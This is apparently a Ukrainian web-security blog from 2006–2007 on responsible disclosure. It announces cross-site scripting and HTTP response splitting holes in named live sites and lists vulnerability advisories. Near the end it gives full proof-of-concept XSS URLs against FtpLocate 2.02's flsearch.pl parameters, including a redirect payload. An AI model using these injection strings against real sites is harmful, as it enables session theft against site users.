Websecurity - Веб безпека

17.12.2006

У жовтні, 09.10.2006, я знайшов HTTP Response Splitting + Cross-Site Scripting уразливість на відомому проекті http://www.glavred.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

Про такий тип уразливостей як HTTP Response Splitting (і варіант його експлуатації HTTP Response Splitting + XSS) я з часом розповім детальніше.

10.03.2007

HTTP Response Splitting + XSS:

• alert(document.cookie)
• alert(’XSS’)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• Engine Manager SQL Injection (деталі)
• ECommerce Store Shop Builder (деталі)
• eShopping SQL Injection (деталі)
• Ustore SQL Injection (деталі)
• WWWeb Cocepts SQL Injection (деталі)
• TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode) (деталі)
• Cross-site scripting vulnerability in index.php in Diesel Pay (деталі)
• Міжсайтовий скриптінг та SQL-ін’єкція в Links Manager (деталі)
• Multiple XSS vulnerabilities in in Diesel Job Site (деталі)
• PHP remote file inclusion in the CropImage component 1.0 for Mambo (деталі)

15.12.2006

У жовтні, 08.10.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://moneynews.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.03.2007

XSS:

• alert(document.cookie)

Уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• A+ Store E-Commerce[ injection sql & xss (post) ] (деталі)
• Blogme v3 [admin login bypass & xss (post)] (деталі)
• FunkyASP Glossary v1.0 [injection sql] (деталі)
• Evolve Merchant[ injection sql ] (деталі)
• Car Site Manager [injection sql & xss (get)] (деталі)
• Inventory Manager [injection sql & xss (get)] (деталі)
• BPG Content Management System SQL Injection (деталі)
• Міжсайтовий скриптінг в Diesel Pay (деталі)
• Cross-site scripting vulnerability in E-commerce 4.7 for Drupal (деталі)
• Міжсайтовий скриптінг в Doika Guestbook (деталі)

14.12.2006

У жовтні, 02.10.2006, я знайшов Cross-Site Scripting уразливість на сайті відомого лічильника http://spylog.ru. Про що найближчим часом сповіщу адміністрацію сайту.

Я вже писав раніше про попередні уразливості на spylog.ru.

Детальна інформація про уразливості з’явиться пізніше.

06.03.2007

XSS:

• alert(document.cookie)
• цікавий

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• Verity Ultraseek Request Proxying Vulnerability (деталі)
• E-Calendar Pro 3.0 [ login bypass & injection sql (post)] (деталі)
• MultiCalendars [ multiples injection sql ] (деталі)
• Dragon calendar [ login bypass & injection sql ] (деталі)
• hpecs shopping cart[login bypass & injection sql (post)] (деталі)
• A-Cart pro[ injection sql (post&get)] (деталі)
• Property Site Manager [login bypass ,multiples injection sql & xss (get)] (деталі)
• SQL injection vulnerability in Drupal Easylinks Module (деталі)
• Міжсайтовий скриптінг та SQL-ін’єкція в indexcity (деталі)
• PHP remote file inclusion vulnerability in Diesel Smart Traffic (деталі)

06.12.2006

У жовтні, 01.10.2006, я знайшов кілька Cross-Site Scripting уразливостей на відомому проекті http://qs.kiev.ua - одразу на декількох його сайтах: http://qs.kiev.ua (портал), http://search.qs.kiev.ua (пошук) та http://news.qs.kiev.ua (новини). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.03.2007

XSS:

http://qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

http://search.qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

http://news.qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

Дані уразливісті досі не виправлені.

В даній добірці уразливості в веб додатках:

• Exophpdesk V1.2 - Remote File Include (деталі)
• PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit (деталі)
• Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection (деталі)
• MetaCart e-Shop [multiples injection sql (get & post)] (деталі)
• E-commerce Kit 1 PayPal Edition [ injection sql ] (деталі)
• TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerablities (деталі)
• Bloo => 1.00 Cross Site Scripting (деталі)
• Міжсайтовий скриптінг в Diesel Job Site (деталі)
• Multiple PHP remote file inclusion in the Rssxt component for Joomla! (деталі)
• Cross-site scripting (XSS) vulnerability in Drupal Easylinks Module (деталі)

Ще в жовтні минулого року (12.10.2006) я знайшов Cross-Site Scripting уразливості в FtpLocate - це движок пошуку по ftp серверам. Дані уразливості зокрема я знайшов на сайті locate.in.ua (про що я писав), адмінам якого я повідомив.

Уразливим до XSS є версія FtpLocate 2.02 (і можливо попередні).

XSS:

Уразливості в скрипті flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit та sizebytes.

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test
http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

13.12.2006

У жовтні, 01.10.2006, я знайшов декілька Cross-Site Scripting уразливостей на популярному проекті http://www.mavicanet.com (Багатомовний Пошуковий Каталог). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

01.03.2007

XSS:

• alert(document.cookie)
• html включення
• html ін’єкція
• alert(document.cookie)
• html включення
• alert(document.cookie)
• цікавий
• html включення

Дані уразливісті досі не виправлені.